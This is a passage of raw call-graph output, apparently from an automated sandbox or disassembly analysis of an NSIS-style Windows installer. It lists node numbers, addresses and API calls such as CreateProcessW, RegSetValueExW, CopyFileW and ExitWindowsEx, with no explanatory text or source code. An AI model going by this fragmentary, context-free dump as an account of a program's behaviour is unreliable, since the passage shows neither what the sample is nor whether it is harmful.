4744 405f51 wsprintfW 4741->4744 4744->4742 4745 4024fb 4746 40145c 18 API calls 4745->4746 4747 402502 4746->4747 4748 40145c 18 API calls 4747->4748 4749 40250c 4748->4749 4750 40145c 18 API calls 4749->4750 4751 402515 4750->4751 4752 40145c 18 API calls 4751->4752 4753 40251f 4752->4753 4754 40145c 18 API calls 4753->4754 4755 402529 4754->4755 4756 40253d 4755->4756 4757 40145c 18 API calls 4755->4757 4758 4062a3 11 API calls 4756->4758 4757->4756 4759 40256a CoCreateInstance 4758->4759 4760 40258c 4759->4760 4761 40497c GetDlgItem GetDlgItem 4762 4049d2 7 API calls 4761->4762 4767 404bea 4761->4767 4763 404a76 DeleteObject 4762->4763 4764 404a6a SendMessageW 4762->4764 4765 404a81 4763->4765 4764->4763 4768 404ab8 4765->4768 4770 406805 18 API calls 4765->4770 4766 404ccf 4769 404d74 4766->4769 4774 404bdd 4766->4774 4779 404d1e SendMessageW 4766->4779 4767->4766 4777 40484e 5 API calls 4767->4777 4790 404c5a 4767->4790 4773 403d3f 19 API calls 4768->4773 4771 404d89 4769->4771 4772 404d7d SendMessageW 4769->4772 4776 404a9a SendMessageW SendMessageW 4770->4776 4781 404da2 4771->4781 4782 404d9b ImageList_Destroy 4771->4782 4792 404db2 4771->4792 4772->4771 4778 404acc 4773->4778 4780 403dca 8 API calls 4774->4780 4775 404cc1 SendMessageW 4775->4766 4776->4765 4777->4790 4783 403d3f 19 API calls 4778->4783 4779->4774 4785 404d33 SendMessageW 4779->4785 4786 404f6b 4780->4786 4787 404dab GlobalFree 4781->4787 4781->4792 4782->4781 4788 404add 4783->4788 4784 404f1c 4784->4774 4793 404f31 ShowWindow GetDlgItem ShowWindow 4784->4793 4789 404d46 4785->4789 4787->4792 4791 404baa GetWindowLongW SetWindowLongW 4788->4791 4800 404ba4 4788->4800 4803 404b39 SendMessageW 4788->4803 4804 404b67 SendMessageW 4788->4804 4805 404b7b SendMessageW 4788->4805 4799 404d57 SendMessageW 4789->4799 4790->4766 4790->4775 4794 404bc4 4791->4794 4792->4784 4795 404de4 4792->4795 4798 40141d 80 API calls 4792->4798 4793->4774 4796 404be2 4794->4796 4797 404bca ShowWindow 4794->4797 4808 404e12 SendMessageW 4795->4808 4811 404e28 4795->4811 4813 403d98 SendMessageW 4796->4813 4812 403d98 SendMessageW 4797->4812 4798->4795 4799->4769 4800->4791 4800->4794 4803->4788 4804->4788 4805->4788 4806 404ef3 InvalidateRect 4806->4784 4807 404f09 4806->4807 4814 4043ad 4807->4814 4808->4811 4810 404ea1 SendMessageW SendMessageW 4810->4811 4811->4806 4811->4810 4812->4774 4813->4767 4815 4043cd 4814->4815 4816 406805 18 API calls 4815->4816 4817 40440d 4816->4817 4818 406805 18 API calls 4817->4818 4819 404418 4818->4819 4820 406805 18 API calls 4819->4820 4821 404428 lstrlenW wsprintfW SetDlgItemTextW 4820->4821 4821->4784 4822 4026fc 4823 401ee4 4822->4823 4825 402708 4822->4825 4823->4822 4824 406805 18 API calls 4823->4824 4824->4823 4274 4019fd 4275 40145c 18 API calls 4274->4275 4276 401a04 4275->4276 4277 405e7f 2 API calls 4276->4277 4278 401a0b 4277->4278 4826 4022fd 4827 40145c 18 API calls 4826->4827 4828 402304 GetFileVersionInfoSizeW 4827->4828 4829 40232b GlobalAlloc 4828->4829 4833 4030e3 4828->4833 4830 40233f GetFileVersionInfoW 4829->4830 4829->4833 4831 402350 VerQueryValueW 4830->4831 4832 402381 GlobalFree 4830->4832 4831->4832 4835 402369 4831->4835 4832->4833 4839 405f51 wsprintfW 4835->4839 4837 402375 4840 405f51 wsprintfW 4837->4840 4839->4837 4840->4832 4841 402afd 4842 40145c 18 API calls 4841->4842 4843 402b04 4842->4843 4848 405e50 GetFileAttributesW CreateFileW 4843->4848 4845 402b10 4846 4030e3 4845->4846 4849 405f51 wsprintfW 4845->4849 4848->4845 4849->4846 4850 4029ff 4851 401553 19 API calls 4850->4851 4852 402a09 4851->4852 4853 40145c 18 API calls 4852->4853 4854 402a12 4853->4854 4855 402a1f RegQueryValueExW 4854->4855 4857 401a13 4854->4857 4856 402a3f 4855->4856 4860 402a45 4855->4860 4856->4860 4861 405f51 wsprintfW 4856->4861 4859 4029e4 RegCloseKey 4859->4857 4860->4857 4860->4859 4861->4860 4862 401000 4863 401037 BeginPaint GetClientRect 4862->4863 4864 40100c DefWindowProcW 4862->4864 4866 4010fc 4863->4866 4867 401182 4864->4867 4868 401073 CreateBrushIndirect FillRect DeleteObject 4866->4868 4869 401105 4866->4869 4868->4866 4870 401170 EndPaint 4869->4870 4871 40110b CreateFontIndirectW 4869->4871 4870->4867 4871->4870 4872 40111b 6 API calls 4871->4872 4872->4870 4873 401f80 4874 401446 18 API calls 4873->4874 4875 401f88 4874->4875 4876 401446 18 API calls 4875->4876 4877 401f93 4876->4877 4878 401fa3 4877->4878 4879 40145c 18 API calls 4877->4879 4880 401fb3 4878->4880 4881 40145c 18 API calls 4878->4881 4879->4878 4882 402006 4880->4882 4883 401fbc 4880->4883 4881->4880 4885 40145c 18 API calls 4882->4885 4884 401446 18 API calls 4883->4884 4887 401fc4 4884->4887 4886 40200d 4885->4886 4888 40145c 18 API calls 4886->4888 4889 401446 18 API calls 4887->4889 4890 402016 FindWindowExW 4888->4890 4891 401fce 4889->4891 4895 402036 4890->4895 4892 401ff6 SendMessageW 4891->4892 4893 401fd8 SendMessageTimeoutW 4891->4893 4892->4895 4893->4895 4894 4030e3 4895->4894 4897 405f51 wsprintfW 4895->4897 4897->4894 4898 402880 4899 402884 4898->4899 4900 40145c 18 API calls 4899->4900 4901 4028a7 4900->4901 4902 40145c 18 API calls 4901->4902 4903 4028b1 4902->4903 4904 4028ba RegCreateKeyExW 4903->4904 4905 4028e8 4904->4905 4912 4029ef 4904->4912 4906 402934 4905->4906 4907 40145c 18 API calls 4905->4907 4908 402963 4906->4908 4911 401446 18 API calls 4906->4911 4910 4028fc lstrlenW 4907->4910 4909 4029ae RegSetValueExW 4908->4909 4913 40337f 37 API calls 4908->4913 4916 4029c6 RegCloseKey 4909->4916 4917 4029cb 4909->4917 4914 402918 4910->4914 4915 40292a 4910->4915 4918 402947 4911->4918 4919 40297b 4913->4919 4920 4062a3 11 API calls 4914->4920 4921 4062a3 11 API calls 4915->4921 4916->4912 4922 4062a3 11 API calls 4917->4922 4923 4062a3 11 API calls 4918->4923 4929 406224 4919->4929 4925 402922 4920->4925 4921->4906 4922->4916 4923->4908 4925->4909 4928 4062a3 11 API calls 4928->4925 4930 406247 4929->4930 4931 40628a 4930->4931 4932 40625c wsprintfW 4930->4932 4933 402991 4931->4933 4934 406293 lstrcatW 4931->4934 4932->4931 4932->4932 4933->4928 4934->4933 4935 402082 4936 401446 18 API calls 4935->4936 4937 402093 SetWindowLongW 4936->4937 4938 4030e3 4937->4938 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 